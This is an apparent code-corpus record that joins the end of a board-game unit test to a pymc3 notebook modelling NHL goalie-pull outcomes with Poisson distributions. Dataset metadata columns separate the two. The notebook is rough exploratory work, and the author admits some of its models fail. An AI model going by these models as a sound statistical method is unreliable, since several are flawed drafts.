assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 6, 5) == 1
assert gamma_move(board, 5, 6, 6) == 1
assert gamma_free_fields(board, 5) == 5
assert gamma_move(board, 6, 7, 6) == 0
assert gamma_move(board, 6, 1, 6) == 0
assert gamma_free_fields(board, 6) == 7
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 6, 0) == 0
assert gamma_move(board, 2, 2, 6) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_move(board, 3, 4, 6) == 0
assert gamma_move(board, 3, 0, 7) == 0
assert gamma_move(board, 4, 4, 6) == 0
assert gamma_golden_move(board, 4, 6, 6) == 1
assert gamma_busy_fields(board, 5) == 7
assert gamma_move(board, 6, 2, 0) == 0
assert gamma_move(board, 2, 7, 1) == 0
assert gamma_move(board, 3, 7, 0) == 0
assert gamma_free_fields(board, 3) == 6
assert gamma_move(board, 5, 6, 1) == 0
assert gamma_move(board, 5, 0, 6) == 1
assert gamma_move(board, 6, 6, 3) == 0
assert gamma_move(board, 6, 0, 6) == 0
assert gamma_move(board, 1, 7, 7) == 1
assert gamma_move(board, 2, 4, 5) == 0
assert gamma_move(board, 2, 5, 1) == 0
assert gamma_busy_fields(board, 2) == 5
assert gamma_move(board, 3, 1, 1) == 0
assert gamma_busy_fields(board, 3) == 8
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 2, 5) == 0
assert gamma_free_fields(board, 5) == 5
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_move(board, 6, 1, 3) == 1
assert gamma_golden_possible(board, 6) == 1
assert gamma_move(board, 1, 6, 3) == 0
assert gamma_move(board, 1, 6, 7) == 0
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_free_fields(board, 2) == 6
assert gamma_move(board, 3, 4, 6) == 0
assert gamma_move(board, 4, 7, 5) == 1
assert gamma_move(board, 5, 2, 4) == 0
assert gamma_move(board, 6, 4, 5) == 0
assert gamma_move(board, 6, 4, 7) == 0
assert gamma_move(board, 1, 4, 6) == 0
assert gamma_move(board, 1, 3, 7) == 0
assert gamma_golden_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 3, 5) == 0
assert gamma_move(board, 2, 7, 2) == 0
assert gamma_move(board, 3, 2, 2) == 0
assert gamma_move(board, 4, 1, 0) == 0
assert gamma_move(board, 4, 1, 5) == 0
assert gamma_move(board, 5, 3, 6) == 0
assert gamma_move(board, 6, 3, 7) == 0
assert gamma_golden_move(board, 6, 0, 0) == 0
assert gamma_move(board, 1, 7, 1) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 6, 1) == 0
assert gamma_move(board, 3, 4, 5) == 0
assert gamma_move(board, 3, 2, 0) == 0
assert gamma_move(board, 5, 4, 3) == 0
assert gamma_move(board, 5, 3, 4) == 1
assert gamma_free_fields(board, 5) == 4
assert gamma_move(board, 6, 6, 7) == 0
assert gamma_golden_move(board, 6, 2, 1) == 0
assert gamma_move(board, 1, 5, 2) == 0
assert gamma_move(board, 2, 4, 1) == 0
assert gamma_move(board, 3, 6, 5) == 0
assert gamma_move(board, 4, 2, 4) == 0
assert gamma_move(board, 6, 4, 5) == 0
assert gamma_move(board, 6, 2, 4) == 0
assert gamma_busy_fields(board, 6) == 8
assert gamma_free_fields(board, 6) == 5
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 4, 6) == 0
gamma_delete(board)
| 32.303125
| 46
| 0.641192
| 1,909
| 10,337
| 3.328444
| 0.034573
| 0.363551
| 0.396601
| 0.528801
| 0.846553
| 0.839314
| 0.754171
| 0.508499
| 0.455461
| 0.433743
| 0
| 0.140369
| 0.177808
| 10,337
| 319
| 47
| 32.404389
| 0.607248
| 0
| 0
| 0.345763
| 0
| 0
| 0.046834
| 0
| 0
| 0
| 0
| 0
| 0.755932
| 1
| 0
| false
| 0
| 0.00339
| 0
| 0.00339
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f233fae9c9ead7b9772084976e5b2720f042e5a
| 57,621
|
py
|
Python
|
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | null | null | null |
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | null | null | null |
notebooks/py/dev_4_bayes_poisson.py
|
agalea91/nhl-goalie-pull-optimization
|
7e57d50163c5f96a22dd5afd96c6e1ba5487c600
|
[
"MIT"
] | 2
|
2019-06-06T10:37:48.000Z
|
2021-03-31T18:28:43.000Z
|
# coding: utf-8
# %load jupyter_default.py
import pandas as pd
import numpy as np
import os
import re
import datetime
import time
import glob
from tqdm import tqdm_notebook
from colorama import Fore, Style
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import matplotlib.colors
import seaborn as sns
get_ipython().run_line_magic('config', "InlineBackend.figure_format='retina'")
sns.set() # Revert to matplotlib defaults
plt.rcParams['figure.figsize'] = (12, 8)
plt.rcParams['axes.labelpad'] = 20
plt.rcParams['legend.fancybox'] = True
plt.style.use('ggplot')
SMALL_SIZE, MEDIUM_SIZE, BIGGER_SIZE = 14, 16, 20
plt.rc('font', size=SMALL_SIZE)
plt.rc('axes', titlesize=SMALL_SIZE)
plt.rc('axes', labelsize=MEDIUM_SIZE)
plt.rc('xtick', labelsize=SMALL_SIZE)
plt.rc('ytick', labelsize=SMALL_SIZE)
plt.rc('legend', fontsize=MEDIUM_SIZE)
plt.rc('axes', titlesize=BIGGER_SIZE)
def savefig(plt, name):
plt.savefig(f'../../figures/{name}.png', bbox_inches='tight', dpi=300)
get_ipython().run_line_magic('load_ext', 'version_information')
get_ipython().run_line_magic('version_information', 'pandas, numpy')
# ## Bayesian Modeling Discussion
#
# We can model the probability of an outcome $y$ as $P_t(y)$ using a discrete **Poisson distribution** i.e. if discretizing the time $t$ in seconds.
#
# $$
# P_t(\mu) = \frac{\mu^te^{-\mu}}{k!}
# $$
#
# Instead we could also assume a Gamma posterior, which has the advantage of being continuous and has more parameters than can be optimized. For now we'll stick with using the simpler Poisson distribution.
#
# Based on a set of goalie pull observations $X$ from 2003-2007 NHL games, we'll solve for the posterior distribution $P_t(y|X)$, the probability of the outcome $y$, given the observations. This is done computationally using markov chain monte carlo and the `pymc3` library.
#
# The outcomes we're interested in are $y = \big\{\mathrm{goal\;for}, \mathrm{goal\;against}, \mathrm{no\;goal}\big\}$.
#
# We'll use a **uniform prior** over the domain of times (last 5mins). Note: when gathering the observations, we throw out goalie pulls greater than 5 minutes from the end of the game (due to high likelihood of false positives when parsing goalie pulls from the raw game table).
#
# Once we find the posteriors discussed above, we can study the risk reward of pulling a goalie. We'll compare posteriors to find the odds of scoring a goal (and the odds of getting scored on) over time $t$ where:
# - **t = Time elapsed** e.g. if there's 3 minutes left, what is the chance that pulling the goalie will result in a goal for?
# - **t = Time since goalie pull** e.g. after the goalie has been pulled for 1 minute, what is the chance of getting a goal?
import pymc3 as pm
# ### Load the training data
ls ../../data/processed/pkl/
def load_data():
files = glob.glob('../../data/processed/pkl/*.pkl')
files = sorted(files)
print(files)
return pd.concat((pd.read_pickle(f) for f in files))
def clean_df(df):
_df = df.copy()
len_0 = _df.shape[0]
print('Removing goal_for_time < 15 mins')
_df = _df[~(_df.goal_for_time < datetime.timedelta(seconds=15*60))]
print(f'Removed {len_0 - _df.shape[0]} total rows')
if 'game_end_time' in df.columns:
len_0 = _df.shape[0]
print('Removing game_end_time < 15 mins')
_df = _df[~(_df.game_end_time < datetime.timedelta(seconds=60*15))]
print(f'Removed {len_0 - _df.shape[0]} total rows')
return _df
df = load_data()
df = clean_df(df)
def load_training_samples(
df,
cols,
masks=[],
dtype='timedelta64[s]'
) -> np.ndarray:
'''
Return buckets of training data.
'''
if not masks:
masks = [None] * len(cols)
out = []
for col, m in zip(cols, masks):
if m is None:
d = df[col].dropna().astype(dtype).values
else:
d = df[col][m].dropna().astype(dtype).values
out.append(d)
print(f'Loaded {len(d)} samples for col {col}')
out = np.array(out)
print(f'Training data shape = {out.shape}')
return out
# ### Rough work
# #### Data loading
def load_training_samples(
df,
cols,
masks=[],
dtype='timedelta64[s]'
) -> np.ndarray:
'''
Return buckets of training data.
'''
if not masks:
masks = [None] * len(cols)
out = []
for col, m in zip(cols, masks):
if m is None:
d = df[col].dropna().astype(dtype).values
else:
d = df[col][m].dropna().astype(dtype).values
out.append(d)
print(f'Loaded {len(d)} samples for col {col}')
out = np.array(out)
print(f'Training data shape = {out.shape}')
return out
# Let's start by modeling the 5 on 6 goal times in 3rd period, where time is a continuous (or rather, discretized by second) and measured in minutes.
features = ['goal_for_time', 'goal_against_time']
training_samples = load_training_samples(df, features)
training_samples[0].shape
training_samples[0][:10]
# To get the proper probabilities, we should weight the
# #### Modeling
# with pm.Model() as model:
# prior_goal_for = pm.Uniform('prior_goal_for', 15, 20)
# prior_goal_against = pm.Uniform('prior_goal_against', 15, 20)
# obs_goal_for = pm.Gamma('obs_goal_for', observed=training_samples[0])
# need to set up priors for all the parameters of the gamma!...
# THINK ABOUT IT
from scipy.stats import poisson
get_ipython().run_line_magic('pinfo', 'poisson')
# ```
# pmf(k, mu, loc=0)
# Probability mass function.
# ```
x = np.arange(0, 20, 1)
y = [poisson.pmf(_x, 1, 1)
for _x in x]
plt.plot(x, y)
def bayes_model(training_samples):
with pm.Model() as model:
# Priors for the mu parameter of the poisson distribution
# Note that mu = mean(Poisson)
mu_goal_for = pm.Uniform('mu_goal_for', 15*60, 20*60)
mu_goal_against = pm.Uniform('mu_goal_against', 15*60, 20*60)
# Observations
obs_goal_for = pm.Poisson('obs_goal_for', mu_goal_for, observed=training_samples[0])
obs_goal_against = pm.Poisson('obs_goal_against', mu_goal_against, observed=training_samples[1])
# Priors for the goal probabilities
p_goal_for = pm.Poisson('p_goal_for', mu_goal_for)
p_goal_against = pm.Poisson('p_goal_against', mu_goal_against)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
# N = 10
# test_training_samples = np.array([training_samples[0][:N],
# training_samples[1][:N]])
# model, trace, burned_trace = bayes_model(test_training_samples)
# model
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
get_ipython().run_line_magic('pinfo', 'pm.plots.traceplot')
pm.plots.traceplot(trace=trace, varnames=['p_goal_for', 'p_goal_against'])
# What do red and blue represent?
pm.plots.plot_posterior(trace=trace['p_goal_for'])
pm.plots.plot_posterior(trace=trace['p_goal_against'])
# The HDR is really interesting! For the above case (normally distributed data), the HDR is pretty much equivalent to the SD based confience interval. However it generalizes to more complicated distributions
#
# https://stats.stackexchange.com/questions/148439/what-is-a-highest-density-region-hdr
# e.g.
#
# 
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
# Include both those plots in blog ^
from scipy.special import factorial
poisson = lambda mu, k: mu**k * np.exp(-mu) / factorial(k)
poisson(0.5, np.array([1, 4, 5, 2]))
from scipy.stats import poisson
get_ipython().run_line_magic('pinfo', 'poisson.pmf')
poisson.pmf(3, 1)
poisson.pmf(np.array([1, 4, 3]), 1)
p = poisson.pmf
# poisson = lambda k, mu: mu**k * np.exp(-mu) / factorial(k)
x = np.arange(16, 22, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean() / 60
y_goal_for = p(x, mu_goal_for)
mu_goal_against = burned_trace['mu_goal_against'].mean() / 60
y_goal_against = p(x, mu_goal_against)
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{avg})$', color='green')
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{avg})$', color='red')
p = poisson.pmf
# poisson = lambda k, mu: mu**k * np.exp(-mu) / factorial(k)
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
y_goal_for = p(x, mu_goal_for)
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_against = p(x, mu_goal_against)
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{avg})$', color='green')
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{avg})$', color='red')
ALPHA = 0.6
LW = 3
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
# (Do not include this plot ^ in blog, but re-use source code)
# In reality, the probability of an empty net goal should be zero after 20 minutes (since the period is over). We would also need to normalize the probabilities such that
#
# $
# \sum_t \big{[} P(\mathrm{goal\;for}; \mu, t) + P(\mathrm{goal\;against}; \mu, t) + P(\mathrm{game\;end}) \big{]} = 1
# $
#
# Since this was just a toy model to get us warmed up with `pymc`, let's just leave this and move on to a more interesting problem.
# ---
# #### Re-loead better training samples
# I wonder if we can answer the question: **what are the odds of scoring a goal based on when the goalie is pulled?**
#
# It's probably best to decide that based on the "time since goalie pull" metric and the time remaining in the game. For the chart above, the goal for probability is clearly shifted to the left - however this does not mean that pulling a goalie at the 19 minute mark will have lower odds of a good outcome than pulling at the 18 minute mark. This chart is just a litlihood of scoring given the goalie pull times.
#
# What we should do is label the goalie pull times with the eventual outcome, then model that.
df.columns
# Load time of pull for eventual outcomes:
feature_names = ['goal_for', 'goal_against']
# Logic for loading the data
features = ['pull_time', 'pull_time']
masks = [~(df.goal_for_time.isnull()), ~(df.goal_against_time.isnull())]
training_samples = load_training_samples(df, features, masks)
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Priors for the mu parameter of the poisson distribution
# Note that mu = mean(Poisson)
mu_goal_for = pm.Uniform('mu_goal_for', 15*60, 20*60)
mu_goal_against = pm.Uniform('mu_goal_against', 15*60, 20*60)
# Observations
obs_goal_for = pm.Poisson('obs_goal_for', mu_goal_for, observed=training_samples[0])
obs_goal_against = pm.Poisson('obs_goal_against', mu_goal_against, observed=training_samples[1])
# Priors for the goal probabilities
p_goal_for = pm.Poisson('p_goal_for', mu_goal_for)
p_goal_against = pm.Poisson('p_goal_against', mu_goal_against)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
LW = 3
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
# Let's test this with a uniform prior
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Priors for the goal probabilties
# Last 5 minutes of the game, in seconds
# p_goal_for = pm.Uniform('p_goal_for', 15*60, 20*60)
# p_goal_against = pm.Uniform('p_goal_against', 15*60, 20*60)
# Priors for the mu parameter of the poisson distribution
# Note that mu = mean(Poisson)
mu_goal_for = pm.Uniform('mu_goal_for', 15*60, 20*60)
mu_goal_against = pm.Uniform('mu_goal_against', 15*60, 20*60)
# Observations
obs_goal_for = pm.Poisson(
'obs_goal_for',
mu=mu_goal_for,
observed=training_samples[0],
)
obs_goal_against = pm.Poisson(
'obs_goal_against',
mu=mu_goal_against,
observed=training_samples[1],
)
p_goal_for = pm.Deterministic(
'p_goal_for', pm.Poisson('posterior_for', mu_goal_for)
)
p_goal_against = pm.Deterministic(
'p_goal_against', pm.Poisson('posterior_against', mu_goal_against)
)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
p = poisson.pmf
x = np.arange(16*60, 22*60, 1)
mu_goal_for = burned_trace['mu_goal_for'].mean()
mu_goal_against = burned_trace['mu_goal_against'].mean()
y_goal_for = p(x, mu_goal_for)
y_goal_against = p(x, mu_goal_against)
# Convert into minutes and rescale to fit chart
x = x / 60
scale_frac = 0.7
y_goal_for = y_goal_for / y_goal_for.max() * scale_frac
y_goal_against = y_goal_against / y_goal_against.max() * scale_frac
plt.plot(x, y_goal_for, label=r'$P(\rm{goal\;for};\mu_{MCMC})$', color='green', lw=LW)
plt.plot(x, y_goal_against, label=r'$P(\rm{goal\;against};\mu_{MCMC})$', color='red', lw=LW)
plt.ylabel('Counts')
# plt.yticks([])
plt.xlabel('Game clock (3rd period)')
plt.legend();
plt.show()
trace['mu_goal_for'].mean(), trace['mu_goal_against'].mean()
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
burned_trace.varnames
# Here I tried to combine the observations and the posterior, but pymc3 treats these as separate types. The observations are deterministic whereas the posteriors are stochastic.
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Observations to train the model
# obs_goal_for = pm.Poisson(
# 'obs_goal_for',
# mu=training_samples[0].mean(),
# observed=training_samples[0],
# )
# obs_goal_against = pm.Poisson(
# 'obs_goal_against',
# mu=training_samples[1].mean(),
# observed=training_samples[1],
# )
# Priors for the mu parameter of the
# Poisson distribution.
# Note that mu = mean(Poisson)
mu_goal_for = pm.Uniform(
'mu_goal_for', 15*60, 20*60
)
mu_goal_against = pm.Uniform(
'mu_goal_against', 15*60, 20*60
)
# Goal probabilities
p_goal_for = pm.Poisson(
'p_goal_for', mu_goal_for, observed=training_samples[0]
)
p_goal_against = pm.Poisson(
'p_goal_against', mu_goal_against, observed=training_samples[1]
)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['p_goal_for'], bins=50,
color='green', label='p_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'], bins=50,
color='red', label='p_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
#
#
# Adding a contraint:
#
# ```_equation = pm.math.eq(p_goal_for + p_goal_against, 1)
# constraint = pm.Potential(
# 'constraint',
# pm.math.switch(_equation, 0, -np.inf)
# )```
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Observations to train the model
obs_goal_for = pm.Poisson(
'obs_goal_for',
mu=training_samples[0].mean(),
observed=training_samples[0],
)
obs_goal_against = pm.Poisson(
'obs_goal_against',
mu=training_samples[1].mean(),
observed=training_samples[1],
)
# Priors for the mu parameter of the
# Poisson distribution.
# Note that mu = mean(Poisson)
mu_goal_for = pm.Uniform(
'mu_goal_for', 15*60, 20*60
)
mu_goal_against = pm.Uniform(
'mu_goal_against', 15*60, 20*60
)
# Goal probabilities
p_goal_for = pm.Poisson(
'p_goal_for', mu_goal_for
)
p_goal_against = pm.Poisson(
'p_goal_against', mu_goal_against
)
# Constraint on probabilties
# Add
_equation = pm.math.eq(p_goal_for + p_goal_against, 1)
constraint = pm.Potential(
'constraint',
pm.math.switch(_equation, 0, -np.inf)
)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
plt.plot(trace['mu_goal_for'], label='mu_goal_for', color='green')
plt.plot(trace['mu_goal_against'], label='mu_goal_against', color='red')
plt.ylabel('$\mu$ (seconds)')
plt.xlabel('MCMC step')
plt.axvline(N_burn, color='black', lw=2, label='Burn threshold')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['mu_goal_for'], bins=50,
color='green', label='mu_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['mu_goal_against'], bins=50,
color='red', label='mu_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
ALPHA = 0.6
plt.hist(burned_trace['p_goal_for'], bins=50,
color='green', label='p_goal_for',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'], bins=50,
color='red', label='p_goal_against',
histtype='stepfilled', alpha=ALPHA)
plt.ylabel('MCMC counts')
plt.xlabel('$\mu$ (seconds)')
plt.legend();
# That didnt work too well...
#
# But we're getting closer to the final model
#
# ---
#
# #### Including "no goals" variable
#
# Lets make them bounded and add in the game end var
df.columns
# Load time of pull for eventual outcomes:
feature_names = ['goal_for', 'goal_against', 'no_goals']
# Logic for loading the data
features = ['pull_time', 'pull_time', 'pull_time']
masks = [
~(df.goal_for_time.isnull()),
~(df.goal_against_time.isnull()),
(df.goal_for_time.isnull() & df.goal_against_time.isnull()),
]
training_samples = load_training_samples(df, features, masks)
(training_samples[0][:10],
training_samples[1][:10],
training_samples[2][:10],)
# Trying constrained model again
def bayes_model(training_samples) -> pm.model.Model:
"""
Solve for posterior distributions using pymc3
"""
with pm.Model() as model:
# Priors for the mu parameter of the
# Poisson distribution P.
# Note: mu = mean(P)
mu_goal_for = pm.Uniform(
'mu_goal_for', 15*60, 20*60
)
mu_goal_against = pm.Uniform(
'mu_goal_against', 15*60, 20*60
)
mu_no_goal = pm.Uniform(
'mu_no_goal', 15*60, 20*60
)
# Observations to train the model on
obs_goal_for = pm.Poisson(
'obs_goal_for',
mu=mu_goal_for,
observed=training_samples[0],
)
obs_goal_against = pm.Poisson(
'obs_goal_against',
mu=mu_goal_against,
observed=training_samples[1],
)
obs_no_goal = pm.Poisson(
'obs_no_goal',
mu=mu_no_goal,
observed=training_samples[2],
)
# Outcome probabilities
p_goal_for = pm.Bound(pm.Poisson, upper=20*60)('p_goal_for', mu=mu_goal_for)
p_goal_against = pm.Bound(pm.Poisson, upper=20*60)('p_goal_against', mu=mu_goal_against)
p_no_goal = pm.Bound(pm.Poisson, upper=20*60)('p_no_goal', mu=mu_no_goal)
# Constraint on probabilties
_equation = pm.math.eq(p_goal_for + p_goal_against + p_no_goal, 1)
constraint = pm.Potential(
'constraint',
pm.math.switch(_equation, 0, -np.inf)
)
# Fit model
step = pm.Metropolis()
trace = pm.sample(18000, step=step)
return model, trace
model, trace = bayes_model(training_samples)
model
N_burn = 10000
burned_trace = trace[N_burn:]
ALPHA = 0.6
LW = 3
from scipy.stats import poisson
# plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
# color='green', label=r'$P(\rm{goal\;for}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
# plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
# color='red', label=r'$P(\rm{goal\;against}\;|\;\rm{goalie\;pulled})$',
# histtype='stepfilled', alpha=ALPHA)
''' Plot the MCMC samples '''
plt.hist(burned_trace['p_goal_for'] / 60, bins=50,
color='green', label='p_goal_for samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_goal_against'] / 60, bins=50,
color='red', label='p_goal_against samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
plt.hist(burned_trace['p_no_goal'] / 60, bins=50,
color='orange', label='p_no_goal samples',
density='normed',
histtype='stepfilled', alpha=ALPHA)
''' Plot the poisson distributions '''
# p = poisson.pmf
# x = np.arange(16*60, 22*60, 1)
# mu_goal_for = burned_trace['mu_goal_for'].mean()
# mu_goal_against = burned_trace['mu_goal_against'].mean()
# mu_no_goal = burned_trace['mu_no_goal'].mean()
# y_goal_for = p(x, mu_goal_for)
# y_goal_against = p(x, mu_goal_against)
# y_no_goal = p(x, mu_no_goal)
